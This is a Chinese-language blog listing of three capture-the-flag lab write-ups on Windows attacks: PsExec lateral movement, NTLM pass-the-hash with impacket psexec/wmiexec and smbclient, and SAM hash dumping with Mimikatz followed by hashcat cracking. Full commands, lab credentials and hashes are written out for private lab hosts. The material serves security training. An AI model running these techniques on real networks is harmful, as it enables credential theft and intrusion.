發表文章

目前顯示的是有「psexec」標籤的文章

Active Directory 中的橫向移動 - Psexec

圖片
 Active Directory 中的橫向移動 - Psexec 要滿足 Psexec 工具進行橫向移動,必須滿足一些條件。  - 對目標電腦進行身份驗證的使用者需要屬於管理員本機群組  - 目標電腦 ADMIN$ 共用必須可用  - 檔案和印表機共用必須開啟 一般電腦預設開放共用的資料夾如下 為了遠端執行命令,PsExec 執行以下任務:  1. 將psexesvc.exe 寫入 C:\Windows 目錄  2. 在遠端主機上建立並產生服務  3. 作為 psexesvc.exe 的子進程運行請求的程式/命令 使用 offsec / lab Client74 本機 Local 管理員帳號登入,執行下列指令 PS : PsExec64.exe 預設沒有安裝,先切換到有上載的資料夾下 指令 ./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd 執行後可以看到已經直接進入到 files04(73) 的 Remote Shell,whoami、hostname、ip config 查看 練習 : 以 client74 上的 offsec 使用者身分進行連線。然後嘗試使用 PsExec 橫向移動到 web04 以獲得位於 jen 桌面上的標誌 RDP 登入 Client74 然後執行 ./PsExec64.exe -i  \\WEB04 -u corp\jen -p Nexus123! cmd 遠端登入 shell 後拿 flag 吧

NTLM PtH

圖片
 NTLM PtH 已知靶機 192.168.197.211,帳號 / 密碼 : gunther / password123! 透過 PTH 技術登入到靶機 192.168.197.212 並在 Administrator 桌面上找到 Flag  第一步先用已知的帳號密碼登入 192.168.197.211 登入後輸入 \\192.168.197.212\secrets,會跳出如下的帳號密碼驗證視窗 使用 gunther 與密碼 password123! 無法登入,所以看來第二台沒有該帳號權限 先抓取現有登入機器的 administrator 帳號 HASH 如下 7a38310ea6f0027ee955abed1762964b 從攻擊機直接透過 smbclient 指令,並指定使用者 administrator 然後密碼用 HASH 登入測試 └─$ smbclient \\\\192.168.197.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b 可以看到成功登入了 接下來使用 impacket 庫中的 psexec.py 腳本來拿 remote shell 由於 HASH 的格式為 "LMHash:NTHash" (LM 在現今系統已無使用,但還是要輸入不可空白) 使用如下指令登入,記得 LM Hash 要輸入一樣的長度,直接用 0 代替即可 └─$ impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.197.212 直接就拿到 remote shell 了,ipconfig 看一下確定是 192.168.197.212 那一台 直接到管理員桌面拿 flag 吧 因為 impacket 當中包含了許多指令與套件,我們可以使用另外一個 wmiexec 也可以成功拿到 remote shell,指令 └─$ impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0...

NTLM 密碼破解

圖片
 NTLM 密碼破解 Windows 將使用者密碼雜湊儲存在安全帳戶管理員 SAM 資料庫檔案中 核心對該檔案保持獨佔檔案系統鎖定 路徑位於 C:\Windows\system32\config\sam 靶機 IP : 192.168.197.210,獲取 nelly 用戶桌面上的 Flag 已知一般使用者帳號密碼 : offsec / lab 第一步 xfreerdp 登入遠端主機並掛載磁碟機 └─$ xfreerdp -v:192.168.197.210 -u:offsec -p:lab -drive:aries,/home/kali_r/Templates 登入後先查看 local 使用者,使用指令 Get-LocalUser 下圖有列出來題目要我們查找的 nelly 使用者,後續就是直接破解該帳號密碼 透過管理員身份啟動 PowerShell,然後啟動 Mimikatz 開始提取密碼,分別輸入以下指令 (每個指令由一個模組和兩個冒號分隔的指令組成)  - privilege::debug  - token::elevate  - lsadump::sam 下面可以看到我們想要的使用者 nelly 的 hash 了,主要要的是這一段 Hash NTLM: 3ae8e5f0ffabb3a627672e1600f1ba10 先建立一個檔案 nelly.hash 並將 HASH 內容貼上 透過指令 └─$ hashcat --help | grep -i "ntlm" 查一下 NTLM 的 mode,是 1000 直接 hashcat 下去破解密碼吧,帶入 rockyou.txt 與 best64 規則來變異密碼表 └─$ hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 答案很快就出來了是 nicole1 RDP 進去看看 └─$ xfreerdp -v:192.168.197.210 -u:nelly -p:nicole1 登入後拿到目標 Flag 了 靶機 2 : 192.168.197.227 已知使用者 n...